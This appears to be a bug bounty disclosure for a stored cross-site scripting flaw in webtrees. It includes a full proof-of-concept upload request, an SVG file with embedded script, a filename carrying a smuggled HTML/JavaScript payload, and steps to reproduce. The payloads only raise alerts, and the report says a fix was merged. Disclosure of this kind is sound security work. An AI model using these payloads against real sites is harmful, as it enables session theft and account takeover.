Cross-site Scripting (XSS) - Stored in fisharebest/webtrees

Valid

Reported on

Oct 8th 2021


Description

Stored XSS via upload file .svg allows for arbitrary execution of JavaScript

Proof of Concept

// PoC.req
POST /demo-dev/tree/demo/add-media-file/X9222 HTTP/2
Host: dev.webtrees.net
Cookie: __Secure-WT-ID=63trarcpiic93psog3t8okts4h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://dev.webtrees.net/demo-dev/tree/demo/media/X9222/Princess-Victoria-of-Hesse-and-by-Rhine
Content-Type: multipart/form-data; boundary=---------------------------405026258827833307651807573856
Content-Length: 1752
Origin: https://dev.webtrees.net
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="_csrf"

NktwFM88jQhclDtOWaJYcd0o77F8n5BI
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="file_location"

upload
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="file"; filename="xss'><img src=x onerror=alert(1)>.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("Ghostlulz XSS");
   </script>
</svg>
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="auto"

0
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="folder"


-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="new_file"


-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="unused"

0_Artémis_(Diane)_-_Galleria_dei_Candelabri_-_Vatican.JPG
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="remote"


-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="title"


-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="type"


-----------------------------405026258827833307651807573856--

Step to Reproduct

Create a file .svg contain payload

Example

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("Ghostlulz XSS");
   </script>
</svg>

Goto details of a person. Example: https://dev.webtrees.net/demo-dev/tree/demo/media/X9222/Princess-Victoria-of-Hesse-and-by-Rhine

At Edit button choose to 'Add a media file'

Upload the file .svg and save it

The XSS will trigger when user click to file media. It will load file svg and trigger xss

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We have contacted a member of the fisharebest/webtrees team and are waiting to hear back 2 months ago
Greg Roach validated this vulnerability 2 months ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Greg Roach confirmed that a fix has been merged on 772953 2 months ago
Greg Roach has been awarded the fix bounty